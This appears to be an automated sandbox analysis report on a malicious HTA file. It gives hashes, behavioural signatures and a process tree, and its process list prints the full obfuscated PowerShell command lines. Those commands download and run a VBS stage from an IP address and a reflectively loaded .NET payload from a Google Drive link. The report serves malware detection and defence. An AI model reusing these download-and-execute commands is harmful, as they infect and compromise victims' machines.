Analysis
-
max time kernel
135s -
max time network
105s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 06:02
Static task
static1
Behavioral task
behavioral1
Sample
sheisthebestcaseeveryoneknowbesththignstobegreatfor.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
sheisthebestcaseeveryoneknowbesththignstobegreatfor.hta
Resource
win10v2004-20241007-en
General
-
Target
sheisthebestcaseeveryoneknowbesththignstobegreatfor.hta
-
Size
130KB
-
MD5
1fd620bfc1434f416a86c5ab0ca98c41
-
SHA1
d2aab0e25bfa3e35f8ed5e8c4a772b7c5c083dcf
-
SHA256
c96daaf1a1dc9722c4a06193e1d651b4604384d0afd2eba041cb67bbbc4a24bd
-
SHA512
46aebd9323692bc22eaf4c5c615acccf73695a82812c0facec9f7017ef0304d48f76a84a1a8a021411e180ec357301c1a1e1c245a7178f73ef34ce13f89f2bc9
-
SSDEEP
96:Eam73ELEyboOrLEy7oOBnN0qfaJdoP8oLSLweoOpWLEy+c7T:Ea23iJaC8hiT
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 19 3452 pOwersHElL.exe 25 5024 powershell.exe 28 5024 powershell.exe 32 5024 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1128 powershell.exe 5024 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 3452 pOwersHElL.exe 1676 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 24 drive.google.com 25 drive.google.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOwersHElL.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings pOwersHElL.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 3452 pOwersHElL.exe 3452 pOwersHElL.exe 1676 powershell.exe 1676 powershell.exe 1128 powershell.exe 1128 powershell.exe 5024 powershell.exe 5024 powershell.exe 5024 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3452 pOwersHElL.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeDebugPrivilege 1128 powershell.exe Token: SeDebugPrivilege 5024 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 4864 wrote to memory of 3452 4864 mshta.exe 87 PID 4864 wrote to memory of 3452 4864 mshta.exe 87 PID 4864 wrote to memory of 3452 4864 mshta.exe 87 PID 3452 wrote to memory of 1676 3452 pOwersHElL.exe 90 PID 3452 wrote to memory of 1676 3452 pOwersHElL.exe 90 PID 3452 wrote to memory of 1676 3452 pOwersHElL.exe 90 PID 3452 wrote to memory of 3288 3452 pOwersHElL.exe 95 PID 3452 wrote to memory of 3288 3452 pOwersHElL.exe 95 PID 3452 wrote to memory of 3288 3452 pOwersHElL.exe 95 PID 3288 wrote to memory of 2852 3288 csc.exe 96 PID 3288 wrote to memory of 2852 3288 csc.exe 96 PID 3288 wrote to memory of 2852 3288 csc.exe 96 PID 3452 wrote to memory of 4272 3452 pOwersHElL.exe 98 PID 3452 wrote to memory of 4272 3452 pOwersHElL.exe 98 PID 3452 wrote to memory of 4272 3452 pOwersHElL.exe 98 PID 4272 wrote to memory of 1128 4272 WScript.exe 99 PID 4272 wrote to memory of 1128 4272 WScript.exe 99 PID 4272 wrote to memory of 1128 4272 WScript.exe 99 PID 1128 wrote to memory of 5024 1128 powershell.exe 103 PID 1128 wrote to memory of 5024 1128 powershell.exe 103 PID 1128 wrote to memory of 5024 1128 powershell.exe 103
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sheisthebestcaseeveryoneknowbesththignstobegreatfor.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\SysWOW64\WIndOwspOwerSheLl\v1.0\pOwersHElL.exe"C:\Windows\SyStem32\WIndOwspOwerSheLl\v1.0\pOwersHElL.exe" "poWERsHEll.eXE -eX BYPaSS -nop -W 1 -C devicEcREDeNtiaLdEpLoYmENT ; Iex($(iEx('[SYStem.TEXT.eNcODiNg]'+[CHar]58+[chAr]58+'UtF8.gEtstRINg([sYStEm.ConVErt]'+[char]58+[CHAr]58+'FrombAse64sTRinG('+[CHaR]34+'JFJ2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFcmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdQUkNUUUdZQmxFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbnpCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTmUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREN6QnZFTkl4eXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpemspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienRmalYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0a0RVUk0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRSdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC40MC84ODgvc2VlYmVzdHRoaW5nc3dpdGhncmVhdG5ld3NnaXZlbm1lLnRJRiIsIiRlTlY6QVBQREFUQVxzZWViZXN0dGhpbmdzd2l0aGdyZWF0bmV3c2dpdmVubS52YlMiLDAsMCk7U3RhclQtU2xFRVAoMyk7U1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VlYmVzdHRoaW5nc3dpdGhncmVhdG5ld3NnaXZlbm0udmJTIg=='+[chAR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX BYPaSS -nop -W 1 -C devicEcREDeNtiaLdEpLoYmENT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g0l5j2lk\g0l5j2lk.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9376.tmp" "c:\Users\Admin\AppData\Local\Temp\g0l5j2lk\CSC742CE3A5F8E451BB0538638F5AC20A1.TMP"4⤵
- System Location Discovery: System Language Discovery
PID:2852
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seebestthingswithgreatnewsgivenm.vbS"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdMZXhpbWFnZVVybCA9IHdMOGh0dHBzOi8vZHJpJysndmUuZ29vJysnZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHdMODtMZXh3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O0xleGltYWdlQnl0ZXMgPSAnKydMZXh3ZScrJ2JDbGllbnQuRG93JysnbmxvYWREYXRhKExleGltYWdlVXJsKTtMZXhpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jJysnb2RpbmddOjpVVEY4LkdldFN0cmluZyhMZXhpbWFnZUJ5dGVzKTtMZXhzdGFydEYnKydsYWcgPSB3TDg8PEJBU0U2NF9TVEFSVD4+d0w4O0xleGVuZCcrJ0ZsYWcgPSB3TDg8PEJBU0U2NF9FTkQ+PndMODtMZXhzdGFydEluZGUnKyd4ID0gTGV4aW1hZ2VUZXh0LkluZGV4T2YoTGV4c3RhcnRGbGFnKTtMZXhlJysnbmRJbmRleCA9IExleGltYWdlVGV4JysndC5JbmRleE9mKExleGVuZEZsYWcpO0xleHN0YXJ0SW5kZXggLWdlIDAgLWFuZCBMZXhlJysnbmRJbmRleCAtZ3QgTGV4c3RhcnRJbmRleDtMZXhzdGFydEluZGV4ICs9ICcrJ0xleHN0YXJ0RmxhZy5MZW5ndGg7TGV4YmFzZTY0TGVuZ3RoID0gTGV4ZW5kSW5kZXggLSBMZXhzdGFydEluZGV4O0xleGJhc2U2NEMnKydvbW1hJysnbmQgPSBMZXhpbWFnZVRleHQuU3Vic3RyaW5nKCcrJ0xleHN0YXJ0SW5kZXgsIExleGJhc2U2NExlbmd0aCk7TGV4YmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoTGV4YmFzZTY0Q29tbWFuZC5Ub0NoYScrJ3JBcnJheSgpIDZNdCBGb3JFYWNoLU9iamVjdCB7IExleF8gfSlbLTEuLi0oTGV4YmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtMZXhjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKExleGJhcycrJ2U2NFJldmVyc2VkKTtMZXhsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoTGV4Y29tbWFuZEJ5dGVzKTtMZXh2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TScrJ2V0aG9kKHdMOFZBSXdMOCk7TGV4dmFpTWV0aG9kLkludm9rZShMZXhudWxsLCBAKHdMOHR4dC5SRUVXUS84ODgvMDQuMDIyLjMuMjkxLy86cHR0aHdMOCwgd0w4ZGVzYXRpdmFkb3dMOCwgd0w4JysnZGVzYXRpdmFkb3dMOCwgd0w4ZGVzYXRpdmFkb3dMOCwgdycrJ0w4QWRkSW5Qcm9jZXNzMzJ3TDgsIHdMOGRlc2F0aXZhZG93TDgsIHdMOGRlc2F0aXZhZG93TDgsd0w4ZGVzYXRpdmFkb3dMOCx3TDhkZXNhdGl2YWRvd0w4LHdMOGRlJysnc2F0aXZhZG93TDgsd0w4ZGVzYXRpdmFkb3dMOCx3TDhkZXNhdGl2JysnYWRvd0w4LHdMODF3TDgnKycsd0w4ZGVzJysnYXRpdmFkb3dMOCkpOycpLnJFcGxhY2UoJ0xleCcsW1NUcmluZ11bQ0hBUl0zNikuckVwbGFjZSgoW0NIQVJdMTE5K1tDSEFSXTc2K1tDSEFSXTU2KSxbU1RyaW5nXVtDSEFSXTM5KS5yRXBsYWNlKChbQ0hBUl01NCtbQ0hBUl03NytbQ0hBUl0xMTYpLCd8JykgfCBpRXg=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('LeximageUrl = wL8https://dri'+'ve.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur wL8;LexwebClient = New-Object System.Net.WebClient;LeximageBytes = '+'Lexwe'+'bClient.Dow'+'nloadData(LeximageUrl);LeximageText = [System.Text.Enc'+'oding]::UTF8.GetString(LeximageBytes);LexstartF'+'lag = wL8<<BASE64_START>>wL8;Lexend'+'Flag = wL8<<BASE64_END>>wL8;LexstartInde'+'x = LeximageText.IndexOf(LexstartFlag);Lexe'+'ndIndex = LeximageTex'+'t.IndexOf(LexendFlag);LexstartIndex -ge 0 -and Lexe'+'ndIndex -gt LexstartIndex;LexstartIndex += '+'LexstartFlag.Length;Lexbase64Length = LexendIndex - LexstartIndex;Lexbase64C'+'omma'+'nd = LeximageText.Substring('+'LexstartIndex, Lexbase64Length);Lexbase64Reversed = -join (Lexbase64Command.ToCha'+'rArray() 6Mt ForEach-Object { Lex_ })[-1..-(Lexbase64Command.Length)];LexcommandBytes = [System.Convert]::FromBase64String(Lexbas'+'e64Reversed);LexloadedAssembly = [System.Reflection.Assembly]::Load(LexcommandBytes);LexvaiMethod = [dnlib.IO.Home].GetM'+'ethod(wL8VAIwL8);LexvaiMethod.Invoke(Lexnull, @(wL8txt.REEWQ/888/04.022.3.291//:ptthwL8, wL8desativadowL8, wL8'+'desativadowL8, wL8desativadowL8, w'+'L8AddInProcess32wL8, wL8desativadowL8, wL8desativadowL8,wL8desativadowL8,wL8desativadowL8,wL8de'+'sativadowL8,wL8desativadowL8,wL8desativ'+'adowL8,wL81wL8'+',wL8des'+'ativadowL8));').rEplace('Lex',[STring][CHAR]36).rEplace(([CHAR]119+[CHAR]76+[CHAR]56),[STring][CHAR]39).rEplace(([CHAR]54+[CHAR]77+[CHAR]116),'|') | iEx"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5024
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
12KB
MD5aa4967de6a26684c2b7b448527c76232
SHA1d45e1440a4bf6c0fedc1b880f13c6b7ab13042ef
SHA256070afc9e64327416ec5f089a512b0a77e51f30a1e7e088a1bb40bb237932c7f9
SHA5126921afae4725862ac92c11f08a4dc286b67fe2373616efb6aaa590211e4be824aedd7585971a6a58448797c198d46b1bc2fe89d27828f94fdec6b419e1a5b735
-
Filesize
18KB
MD508e8c902089189f057cc1ba1919a3dbc
SHA1ee6aed7f62797bfef4ce0bcbc61a82b062e4403a
SHA25698bd7eca8fca81098b3013262ae804c91b9fbe5cdc189a4b278c2a67ce5e3ab6
SHA512198b681bbacf1fecbe40d824eecd45dc2561bdc1bbdc8078a346e4c301616c66e5d6e37a81e30201d79db836e90d03c69ba3f0a92a2ff2fe68946375a8b0ce95
-
Filesize
1KB
MD58621ae465457be9dd9c531fbfb13953d
SHA1cab86e2e9e2f670f1297c708a23fb8f991ca97f9
SHA256d322d9311dccd9d23b95ff7a7dfc012d077d6f4e456b18533000bb8ed9884780
SHA5124476071b28fe35ece9a740b57989de4c0c6953c517a5ceedc95c5a9d9d22bdc93228822ba41286b7a9ff1319a43dea3d486fa7ac0f456ccf7eed7cb017f2ef50
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD52e748a30bc7e286c4c3d3d56643bfeb5
SHA1654fbc69a6df9d7a11547b665d8e0584cb49bcbf
SHA2562bdc8182853c170e3ff4c4e225969e137a75100327bc10e3ca5c4444cdc27501
SHA5128ff76a8e31286aea5db9b1465cba12d6f8bc0a263a0100ac395b6855b9787173e21532f3a52ca59add9f095fff2197ed7f47ade386a8e1249a219bc366a50a49
-
Filesize
191KB
MD53b2dfe853b29b8f7c863a177c77b2e0a
SHA1f15bcc4bab2d0f9d84c6e09947982d86c9719524
SHA256605997c72f3ef670c71c934cbb9b9b989fb83be8e7e9303df63695ecbaca4d1e
SHA512d32da36c3c5ba33b840f8a99e5c8a13df9761e6b84c7b11c1d91e2eabeb478d564ea9801f36a5099741a90bf19ac0f83e445a46d94192693eeb5cc55635557ff
-
Filesize
652B
MD5171ea10abbff5b4003e63f3d059bbaf3
SHA1dd00312b20dc0ac2b44d0fb1a8f95d0101c10e8f
SHA2563074b7ea926bb1ffbf6c17774aece32e216435d0faa9a8c9bd9bc4546ba33290
SHA512c62937b294f99dac4871891a3668ac7d0b25e94d3b516d7782f0fcffa2cef7c5ee3aed34e1d8ae8dd93a75d662a7c79106ddad90ee4bc95fc049f9dd0ed0349c
-
Filesize
472B
MD5ebe44eb3851718dda661ef08a5ae1f72
SHA1fc84762887e0b10691ab43cb52f59169096936ec
SHA2563c667a3bd30fef3aa5caf37fb56f20687efa429605d0412bad70f15890e9e6d4
SHA51299a0db30aac98a290b73db9bfd3a5aa7f1aba22e5e2dcf2e73b5749f8ddcc01d4520d47b428f647ef622bfd893962c5efc55237b3cd5b2a95c186ecb41d7256e
-
Filesize
369B
MD5432724b649df9f2711e8eebd2033ce5d
SHA1ed35920788e79440d12c46ca499b0f3d603d2904
SHA256a279ddef725c9a6bd92606180cbce21b66b4632313c4d0183ec6fd22f617da99
SHA512cd4a0d2ce1da387ed7e3a6dd16dcf6b6f707f7b08c0437d79a361e22975c2f0a0e5c17895fca6581bdcb5dfd7f3dd5cf8e5cdefbaa5f29b52479c72b97abc339